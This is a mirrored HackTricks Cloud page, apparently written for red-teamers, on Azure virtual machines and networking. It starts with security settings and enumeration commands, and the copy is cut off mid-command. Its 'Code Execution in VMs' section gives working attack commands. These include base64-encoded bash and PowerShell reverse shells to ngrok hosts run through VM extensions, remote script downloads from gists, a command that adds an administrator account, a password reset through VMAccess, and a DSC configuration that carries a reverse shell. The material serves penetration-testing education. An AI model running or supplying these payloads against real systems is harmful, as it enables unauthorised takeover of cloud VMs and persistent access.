mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-02 15:59:58 -08:00
901 lines
42 KiB
Markdown
901 lines
42 KiB
Markdown
# Az - Virtual Machines & Network
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
## Azure Networking Basic Info
|
|
|
|
Azure networks contains **different entities and ways to configure it.** You can find a brief **descriptions,** **examples** and **enumeration** commands of the different Azure network entities in:
|
|
|
|
{% content-ref url="az-azure-network.md" %}
|
|
[az-azure-network.md](az-azure-network.md)
|
|
{% endcontent-ref %}
|
|
|
|
## VMs Basic information
|
|
|
|
Azure Virtual Machines (VMs) are flexible, on-demand **cloud-based servers that let you run Windows or Linux operating systems**. They allow you to deploy applications and workloads without managing physical hardware. Azure VMs can be configured with various CPU, memory, and storage options to meet specific needs and integrate with Azure services like virtual networks, storage, and security tools.
|
|
|
|
### Security Configurations
|
|
|
|
* **Availability Zones**: Availability zones are distinct groups of datacenters within a specific Azure region which are physically separated to minimize the risk of multiple zones being affected by local outages or disasters.
|
|
* **Security Type**:
|
|
* **Standard Security**: This is the default security type that does not require any specific configuration.
|
|
* **Trusted Launch**: This security type enhances protection against boot kits and kernel-level malware by using Secure Boot and Virtual Trusted Platform Module (vTPM).
|
|
* **Confidential VMs**: On top of a trusted launch, it offers hardware-based isolation between the VM, hypervisor and host management, improves the disk encryption and [**more**](https://learn.microsoft.com/en-us/azure/confidential-computing/confidential-vm-overview)**.**
|
|
* **Authentication**: By default a new **SSH key is generated**, although it's possible to use a public key or use a previous key and the username by default is **azureuser**. It's also possible to configure to use a **password.**
|
|
* **VM disk encryption:** The disk is encrypted at rest by default using a platform managed key.
|
|
* It's also possible to enable **Encryption at host**, where the data will be encrypted in the host before sending it to the storage service, ensuring an end-to-end encryption between the host and the storage service ([**docs**](https://learn.microsoft.com/en-gb/azure/virtual-machines/disk-encryption#encryption-at-host---end-to-end-encryption-for-your-vm-data)).
|
|
* **NIC network security group**:
|
|
* **None**: Basically opens every port
|
|
* **Basic**: Allows to easily open the inbound ports HTTP (80), HTTPS (443), SSH (22), RDP (3389)
|
|
* **Advanced**: Select a security group
|
|
* **Backup**: It's possible to enable **Standard** backup (one a day) and **Enhanced** (multiple per day)
|
|
* **Patch orchestration options**: This enable to automatically apply patches in the VMs according to the selected policy as described in the [**docs**](https://learn.microsoft.com/en-us/azure/virtual-machines/automatic-vm-guest-patching).
|
|
* **Alerts**: It's possible to automatically get alerts by email or mobile app when something happen in the VM. Default rules:
|
|
* Percentage CPU is greater than 80%
|
|
* Available Memory Bytes is less than 1GB
|
|
* Data Disks IOPS Consumed Percentage is greater than 95%
|
|
* OS IOPS Consumed Percentage is greater than 95%
|
|
* Network in Total is greater than 500GB
|
|
* Network Out Total is greater than 200GB
|
|
* VmAvailabilityMetric is less than 1
|
|
* **Heath monitor**: By default check protocol HTTP in port 80
|
|
* **Locks**: It allows to lock a VM so it can only be read (**ReadOnly** lock) or it can be read and updated but not deleted (**CanNotDelete** lock).
|
|
* Most VM related resources **also support locks** like disks, snapshots...
|
|
* Locks can also be applied at **resource group and subscription levels**
|
|
|
|
## Disks & snapshots
|
|
|
|
* It's possible to **enable to attach a disk to 2 or more VMs**
|
|
* By default every disk is **encrypted** with a platform key.
|
|
* Same in snapshots
|
|
* By default it's possible to **share the disk from all networks**, but it can also be **restricted** to only certain **private acces**s or to **completely disable** public and private access.
|
|
* Same in snapshots
|
|
* It's possible to **generate a SAS URI** (of max 60days) to **export the disk**, which can be configured to require authentication or not
|
|
* Same in snapshots
|
|
|
|
{% tabs %}
|
|
{% tab title="az cli" %}
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# List all disks
|
|
az disk list --output table
|
|
|
|
# Get info about a disk
|
|
az disk show --name <disk-name> --resource-group <rsc-group>
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% tab title="PowerShell" %}
|
|
{% code overflow="wrap" %}
|
|
```powershell
|
|
# List all disks
|
|
Get-AzDisk
|
|
|
|
# Get info about a disk
|
|
Get-AzDisk -Name <DiskName> -ResourceGroupName <ResourceGroupName>
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% endtabs %}
|
|
|
|
|
|
## Images, Gallery Images & Restore points
|
|
|
|
A **VM image** is a template that contains the operating system, application settings and filesystem needed to **create a new virtual machine (VM)**. The difference between an image and a disk snapshot is that a disk snapshot is a read-only, point-in-time copy of a single managed disk, used primarily for backup or troubleshooting, while an image can contain **multiple disks and is designed to serve as a template for creating new VMs**.\
|
|
Images can be managed in the **Images section** of Azure or inside **Azure compute galleries** which allows to generate **versions** and **share** the image cross-tenant of even make it public.
|
|
|
|
A **restore point** stores the VM configuration and **point-in-time** application-consistent **snapshots of all the managed disks** attached to the VM. It's related to the VM and its purpose is to be able to restore that VM to how it was in that specific point in it.
|
|
|
|
{% tabs %}
|
|
{% tab title="az cli" %}
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# Shared Image Galleries | Compute Galleries
|
|
## List all galleries and get info about one
|
|
az sig list --output table
|
|
az sig show --gallery-name <name> --resource-group <rsc-group>
|
|
|
|
## List all community galleries
|
|
az sig list-community --output table
|
|
|
|
## List galleries shaerd with me
|
|
az sig list-shared --location <location> --output table
|
|
|
|
## List all image definitions in a gallery and get info about one
|
|
az sig image-definition list --gallery-name <name> --resource-group <rsc-group> --output table
|
|
az sig image-definition show --gallery-image-definition <name> --gallery-name <gallery-name> --resource-group <rsc-group>
|
|
|
|
## List all the versions of an image definition in a gallery
|
|
az sig image-version list --gallery-image-name <image-name> --gallery-name <gallery-name> --resource-group <rsc-group --output table
|
|
|
|
## List all VM applications inside a gallery
|
|
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
|
|
|
|
# Images
|
|
# List all managed images in your subscription
|
|
az image list --output table
|
|
|
|
# Restore points
|
|
## List all restore points and get info about 1
|
|
az restore-point collection list-all --output table
|
|
az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% tab title="PowerShell" %}
|
|
{% code overflow="wrap" %}
|
|
```powershell
|
|
## List all galleries and get info about one
|
|
Get-AzGallery
|
|
Get-AzGallery -Name <GalleryName> -ResourceGroupName <ResourceGroupName>
|
|
|
|
## List all image definitions in a gallery and get info about one
|
|
Get-AzGalleryImageDefinition -GalleryName <GalleryName> -ResourceGroupName <ResourceGroupName>
|
|
Get-AzGalleryImageDefinition -GalleryName <GalleryName> -ResourceGroupName <ResourceGroupName> -Name <ImageDefinitionName>
|
|
|
|
## List all the versions of an image definition in a gallery
|
|
Get-AzGalleryImageVersion -GalleryImageDefinitionName <ImageName> -GalleryName <GalleryName> -ResourceGroupName <ResourceGroupName>
|
|
|
|
## List all VM applications inside a gallery
|
|
Get-AzGalleryApplication -GalleryName <GalleryName> -ResourceGroupName <ResourceGroupName>
|
|
|
|
# Images
|
|
# List all managed images in your subscription
|
|
Get-AzImage -Name <ResourceName> -ResourceGroupName <ResourceGroupName>
|
|
|
|
# Restore points
|
|
## List all restore points and get info about 1
|
|
Get-AzRestorePointCollection -Name <CollectionName> -ResourceGroupName <ResourceGroupName>
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% endtabs %}
|
|
|
|
## Azure Site Recovery
|
|
|
|
From the [**docs**](https://learn.microsoft.com/en-us/azure/site-recovery/site-recovery-overview): Site Recovery helps ensure business continuity by keeping business apps and workloads running during outages. Site Recovery **replicates workloads** running on physical and virtual machines (VMs) from a primary site to a secondary location. When an outage occurs at your primary site, you fail over to a secondary location, and access apps from there. After the primary location is running again, you can fail back to it.
|
|
|
|
## Azure Bastion
|
|
|
|
Azure Bastion enables secure and seamless **Remote Desktop Protocol (RDP)** and **Secure Shell (SSH)** access to your virtual machines (VMs) directly through the Azure Portal or via a jump box. By **eliminating the need for public IP addresses** on your VMs. 
|
|
|
|
The Bastion deploys a subnet called **`AzureBastionSubnet`** with a `/26` netmask in the VNet it needs to work on. Then, it allows to **connect to internal VMs through the browser** using `RDP` and `SSH` avoiding exposing ports of the VMs to the Internet. It can also work as a **jump host**.
|
|
|
|
To list all Azure Bastion Hosts in your subscription and connect to VMs through them, you can use the following commands:
|
|
|
|
{% tabs %}
|
|
{% tab title="az cli" %}
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# List bastions
|
|
az network bastion list -o table
|
|
|
|
# Connect via SSH through bastion
|
|
az network bastion ssh \
|
|
--name MyBastion \
|
|
--resource-group MyResourceGroup \
|
|
--target-resource-id /subscriptions/12345678-1234-1234-1234-123456789abc/resourceGroups/MyResourceGroup/providers/Microsoft.Compute/virtualMachines/MyVM \
|
|
--auth-type ssh-key \
|
|
--username azureuser \
|
|
--ssh-key ~/.ssh/id_rsa
|
|
|
|
# Connect via RDP through bastion
|
|
az network bastion rdp \
|
|
--name <BASTION_NAME> \
|
|
--resource-group <RESOURCE_GROUP> \
|
|
--target-resource-id /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/virtualMachines/<VM_NAME> \
|
|
--auth-type password \
|
|
--username <VM_USERNAME> \
|
|
--password <VM_PASSWORD>
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% tab title="PowerShell" %}
|
|
{% code overflow="wrap" %}
|
|
```powershell
|
|
# List bastions
|
|
Get-AzBastion
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% endtabs %}
|
|
|
|
## Metadata
|
|
|
|
The Azure Instance Metadata Service (IMDS) **provides information about running virtual machine instances** to assist with their management and configuration. It offers details such as the SKU, storage, network configurations, and information about upcoming maintenance events via **REST API available at the non-routable IP address 169.254.169.254**, which is accessible only from within the VM. Communication between the VM and IMDS stays within the host, ensuring secure access. When querying IMDS, HTTP clients inside the VM should bypass web proxies to ensure proper communication.
|
|
|
|
Moreover, to contact the metadata endpoint, the HTTP request must have the header **`Metadata: true`** and must not have the header **`X-Forwarded-For`**.
|
|
|
|
Check how to enumerate it in:
|
|
|
|
{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %}
|
|
|
|
## VM Enumeration
|
|
|
|
{% tabs %}
|
|
{% tab title="Az Cli" %}
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# VMs
|
|
## List all VMs and get info about one
|
|
az vm list --output table
|
|
az vm show --name <came> --resource-group <rsc-group>
|
|
|
|
## List all available VM images and get info about one
|
|
az vm image list --all --output table
|
|
|
|
# VM Extensions
|
|
## List all VM extensions
|
|
az vm extension image list --output table
|
|
|
|
## Get extensions by publisher
|
|
az vm extension image list --publisher "Site24x7" --output table
|
|
|
|
## List extensions in a VM
|
|
az vm extension list -g <rsc-group> --vm-name <vm-name>
|
|
|
|
## List managed identities in a VM
|
|
az vm identity show \
|
|
--resource-group <rsc-group> \
|
|
--name <vm-name>
|
|
|
|
# Disks
|
|
## List all disks and get info about one
|
|
az disk list --output table
|
|
az disk show --name <disk-name> --resource-group <rsc-group>
|
|
|
|
# Snapshots
|
|
## List all galleries abd get info about one
|
|
az sig list --output table
|
|
az sig show --gallery-name <name> --resource-group <rsc-group>
|
|
|
|
## List all snapshots and get info about one
|
|
az snapshot list --output table
|
|
az snapshot show --name <name> --resource-group <rsc-group>
|
|
|
|
# Shared Image Galleries | Compute Galleries
|
|
## List all galleries and get info about one
|
|
az sig list --output table
|
|
az sig show --gallery-name <name> --resource-group <rsc-group>
|
|
|
|
## List all community galleries
|
|
az sig list-community --output table
|
|
|
|
## List galleries shared with me
|
|
az sig list-shared --location <location> --output table
|
|
|
|
## List all image definitions in a gallery and get info about one
|
|
az sig image-definition list --gallery-name <name> --resource-group <rsc-group> --output table
|
|
az sig image-definition show --gallery-image-definition <name> --gallery-name <gallery-name> --resource-group <rsc-group>
|
|
|
|
## List all the versions of an image definition in a gallery
|
|
az sig image-version list --gallery-image-name <image-name> --gallery-name <gallery-name> --resource-group <rsc-group --output table
|
|
|
|
## List all VM applications inside a gallery
|
|
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
|
|
|
|
# Images
|
|
# List all managed images in your subscription
|
|
az image list --output table
|
|
|
|
# Restore points
|
|
## List all restore points and get info about 1
|
|
az restore-point collection list-all --output table
|
|
az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>
|
|
|
|
# Bastion
|
|
## list all bastions
|
|
az network bastion list -o table
|
|
|
|
# Network
|
|
## List VNets
|
|
az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}"
|
|
|
|
## List subnets of a VNet
|
|
az network vnet subnet list --resource-group <ResourceGroupName> --vnet-name <VNetName> --query "[].{name:name, addressPrefix:addressPrefix}" -o table
|
|
|
|
## List public IPs
|
|
az network public-ip list --output table
|
|
|
|
## Get NSG rules
|
|
az network nsg rule list --nsg-name <NSGName> --resource-group <ResourceGroupName> --query "[].{name:name, priority:priority, direction:direction, access:access, protocol:protocol, sourceAddressPrefix:sourceAddressPrefix, destinationAddressPrefix:destinationAddressPrefix, sourcePortRange:sourcePortRange, destinationPortRange:destinationPortRange}" -o table
|
|
|
|
## Get NICs and subnets using this NSG
|
|
az network nsg show --name MyLowCostVM-nsg --resource-group Resource_Group_1 --query "{subnets: subnets, networkInterfaces: networkInterfaces}"
|
|
|
|
## List all Nics & get info of a single one
|
|
az network nic list --output table
|
|
az network nic show --name <name> --resource-group <rsc-group>
|
|
|
|
## List Azure Firewalls
|
|
az network firewall list --query "[].{name:name, location:location, subnet:subnet, publicIp:publicIp}" -o table
|
|
|
|
## Get network rules of a firewall
|
|
az network firewall network-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table
|
|
|
|
## Get application rules of a firewall
|
|
az network firewall application-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table
|
|
|
|
## Get nat rules of a firewall
|
|
az network firewall nat-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table
|
|
|
|
## List Route Tables
|
|
az network route-table list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table
|
|
|
|
## List routes for a table
|
|
az network route-table route list --route-table-name <RouteTableName> --resource-group <ResourceGroupName> --query "[].{name:name, addressPrefix:addressPrefix, nextHopType:nextHopType, nextHopIpAddress:nextHopIpAddress}" -o table
|
|
|
|
# Misc
|
|
## List all virtual machine scale sets
|
|
az vmss list --output table
|
|
|
|
## List all availability sets
|
|
az vm availability-set list --output table
|
|
|
|
## List all load balancers
|
|
az network lb list --output table
|
|
|
|
## List all storage accounts
|
|
az storage account list --output table
|
|
|
|
## List all custom script extensions on a specific VM
|
|
az vm extension list --vm-name <vm-name> --resource-group <resource-group>
|
|
|
|
# Show boot diagnostics settings for a specific VM
|
|
az vm boot-diagnostics get-boot-log --name <vm-name> --resource-group <resource-group>
|
|
|
|
## List all tags on virtual machines
|
|
az resource list --resource-type "Microsoft.Compute/virtualMachines" --query "[].{Name:name, Tags:tags}" --output table
|
|
|
|
# List all available run commands for virtual machines
|
|
az vm run-command list --output table
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% tab title="Az PS" %}
|
|
```powershell
|
|
# Get readable VMs
|
|
Get-AzVM | fl
|
|
# Lis running VMs
|
|
Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
|
|
Get-AzVM -Name <name> -ResourceGroupName <res_group_name> | fl *
|
|
Get-AzVM -Name <name> -ResourceGroupName <res_group_name> | select -ExpandProperty NetworkProfile
|
|
|
|
# Get iface and IP address
|
|
Get-AzNetworkInterface -Name <interface_name>
|
|
Get-AzPublicIpAddress -Name <iface_public_ip_id>
|
|
|
|
#Get installed extensions
|
|
Get-AzVMExtension -ResourceGroupName <res_group_name> -VMName <name>
|
|
|
|
Get-AzVM | select -ExpandProperty NetworkProfile # Get name of network connector of VM
|
|
Get-AzNetworkInterface -Name <name> # Get info of network connector (like IP)
|
|
|
|
# Disks
|
|
## List all disks and get info about one
|
|
Get-AzDisk
|
|
Get-AzDisk -Name <DiskName> -ResourceGroupName <ResourceGroupName>
|
|
|
|
# Snapshots
|
|
## List all galleries abd get info about one
|
|
Get-AzGallery
|
|
Get-AzGallery -Name <GalleryName> -ResourceGroupName <ResourceGroupName>
|
|
|
|
## List all snapshots and get info about one
|
|
Get-AzSnapshot
|
|
Get-AzSnapshot -Name <SnapshotName> -ResourceGroupName <ResourceGroupName>
|
|
|
|
## List all image definitions in a gallery and get info about one
|
|
Get-AzGalleryImageDefinition -GalleryName <GalleryName> -ResourceGroupName <ResourceGroupName>
|
|
Get-AzGalleryImageDefinition -GalleryName <GalleryName> -ResourceGroupName <ResourceGroupName> -Name <ImageDefinitionName>
|
|
|
|
## List all the versions of an image definition in a gallery
|
|
Get-AzGalleryImageVersion -GalleryImageDefinitionName <ImageName> -GalleryName <GalleryName> -ResourceGroupName <ResourceGroupName>
|
|
|
|
## List all VM applications inside a gallery
|
|
Get-AzGalleryApplication -GalleryName <GalleryName> -ResourceGroupName <ResourceGroupName>
|
|
|
|
# Images
|
|
# List all managed images in your subscription
|
|
Get-AzImage -Name <ResourceName> -ResourceGroupName <ResourceGroupName>
|
|
|
|
# Restore points
|
|
## List all restore points and get info about 1
|
|
Get-AzRestorePointCollection -Name <CollectionName> -ResourceGroupName <ResourceGroupName>
|
|
|
|
# Bastion
|
|
## List bastions
|
|
Get-AzBastion
|
|
|
|
# Network
|
|
## List all VNets in your subscription
|
|
Get-AzVirtualNetwork
|
|
|
|
## List VNet peering connections for a given VNet
|
|
(Get-AzVirtualNetwork -ResourceGroupName <ResourceGroupName> -Name <VNetName>).VirtualNetworkPeerings
|
|
|
|
## List Shared Resources (e.g., Azure Firewall) in the Hub
|
|
Get-AzFirewall
|
|
|
|
## List VPN Gateways
|
|
Get-AzVirtualNetworkGateway -ResourceGroupName <ResourceGroupName>
|
|
|
|
## List VPN Connections
|
|
Get-AzVirtualNetworkGatewayConnection -ResourceGroupName <ResourceGroupName>
|
|
|
|
## List ExpressRoute Circuits
|
|
Get-AzExpressRouteCircuit
|
|
|
|
# Misc
|
|
## List all virtual machine scale sets
|
|
Get-AzVmss
|
|
|
|
## List all availability sets
|
|
Get-AzAvailabilitySet
|
|
|
|
## List all load balancers
|
|
Get-AzLoadBalancer
|
|
|
|
## List all storage accounts
|
|
Get-AzStorageAccount
|
|
|
|
## List all custom script extensions on a specific VM
|
|
Get-AzVMExtension -VMName <VmName> -ResourceGroupName <ResourceGroupName>
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% endtabs %}
|
|
|
|
## Code Execution in VMs
|
|
|
|
### VM Extensions
|
|
|
|
Azure VM extensions are small applications that provide **post-deployment configuration** and automation tasks on Azure virtual machines (VMs).
|
|
|
|
This would allow to **execute arbitrary code inside VMs**.
|
|
|
|
The required permission is **`Microsoft.Compute/virtualMachines/extensions/write`**.
|
|
|
|
It's possible to list all the available extensions with:
|
|
|
|
{% tabs %}
|
|
{% tab title="Az Cli" %}
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# It takes some mins to run
|
|
az vm extension image list --output table
|
|
|
|
# Get extensions by publisher
|
|
az vm extension image list --publisher "Site24x7" --output table
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% tab title="PowerShell" %}
|
|
{% code overflow="wrap" %}
|
|
```powershell
|
|
# It takes some mins to run
|
|
Get-AzVMExtensionImage -Location <Location> -PublisherName <PublisherName> -Type <Type>
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% endtabs %}
|
|
|
|
|
|
It's possible to **run custom extensions that runs custom code**:
|
|
|
|
{% tabs %}
|
|
{% tab title="Linux" %}
|
|
* Execute a revers shell
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# Prepare the rev shell
|
|
echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
|
|
YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ==
|
|
|
|
# Execute rev shell
|
|
az vm extension set \
|
|
--resource-group <rsc-group> \
|
|
--vm-name <vm-name> \
|
|
--name CustomScript \
|
|
--publisher Microsoft.Azure.Extensions \
|
|
--version 2.1 \
|
|
--settings '{}' \
|
|
--protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
|
|
```
|
|
{% endcode %}
|
|
|
|
* Execute a script located on the internet
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
az vm extension set \
|
|
--resource-group rsc-group> \
|
|
--vm-name <vm-name> \
|
|
--name CustomScript \
|
|
--publisher Microsoft.Azure.Extensions \
|
|
--version 2.1 \
|
|
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
|
|
--protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
|
|
{% tab title="Windows" %}
|
|
* Execute a reverse shell
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
# Get encoded reverse shell
|
|
echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
|
|
|
|
# Execute it
|
|
az vm extension set \
|
|
--resource-group <rsc-group> \
|
|
--vm-name <vm-name> \
|
|
--name CustomScriptExtension \
|
|
--publisher Microsoft.Compute \
|
|
--version 1.10 \
|
|
--settings '{}' \
|
|
--protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
|
|
|
|
```
|
|
{% endcode %}
|
|
|
|
* Execute reverse shell from file
|
|
|
|
{% code overflow="wrap" %}
|
|
```bash
|
|
az vm extension set \
|
|
--resource-group <rsc-group> \
|
|
--vm-name <vm-name> \
|
|
--name CustomScriptExtension \
|
|
--publisher Microsoft.Compute \
|
|
--version 1.10 \
|
|
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
|
|
--protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
|
|
```
|
|
{% endcode %}
|
|
|
|
You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
|
|
|
|
* Reset password using the VMAccess extension
|
|
|
|
{% code overflow="wrap" %}
|
|
```powershell
|
|
# Run VMAccess extension to reset the password
|
|
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
|
|
Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
|
|
```
|
|
{% endcode %}
|
|
{% endtab %}
|
|
{% endtabs %}
|
|
|
|
### Relevant VM extensions
|
|
|
|
The required permission is still **`Microsoft.Compute/virtualMachines/extensions/write`**.
|
|
|
|
<details>
|
|
|
|
<summary>VMAccess extension</summary>
|
|
|
|
This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs.
|
|
|
|
{% code overflow="wrap" %}
|
|
```powershell
|
|
# Run VMAccess extension to reset the password
|
|
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
|
|
Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
|
|
```
|
|
{% endcode %}
|
|
|
|
</details>
|
|
|
|
<details>
|
|
|
|
<summary>DesiredConfigurationState (DSC)</summary>
|
|
|
|
This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension:
|
|
|
|
```powershell
|
|
# Content of revShell.ps1
|
|
Configuration RevShellConfig {
|
|
Node localhost {
|
|
Script ReverseShell {
|
|
GetScript = { @{} }
|
|
SetScript = {
|
|
$client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port);
|
|
$stream = $client.GetStream();
|
|
[byte[]]$bytes = 0..65535|%{0};
|
|
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
|
|
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
|
|
$sendback = (iex $data 2>&1 | Out-String );
|
|
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
|
|
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
|
|
$stream.Write($sendbyte, 0, $sendbyte.Length)
|
|
}
|
|
$client.Close()
|
|
}
|
|
TestScript = { return $false }
|
|
}
|
|
}
|
|
}
|
|
RevShellConfig -OutputPath .\Output
|
|
|
|
# Upload config to blob
|
|
$resourceGroup = 'dscVmDemo'
|
|
$storageName = 'demostorage'
|
|
Publish-AzVMDscConfiguration `
|
|
-ConfigurationPath .\revShell.ps1 `
|
|
-ResourceGroupName $resourceGroup `
|
|
-StorageAccountName $storageName `
|
|
-Force
|
|
|
|
# Apply DSC to VM and execute rev shell
|
|
$vmName = 'myVM'
|
|
Set-AzVMDscExtension `
|
|
-Version '2.76' `
|
|
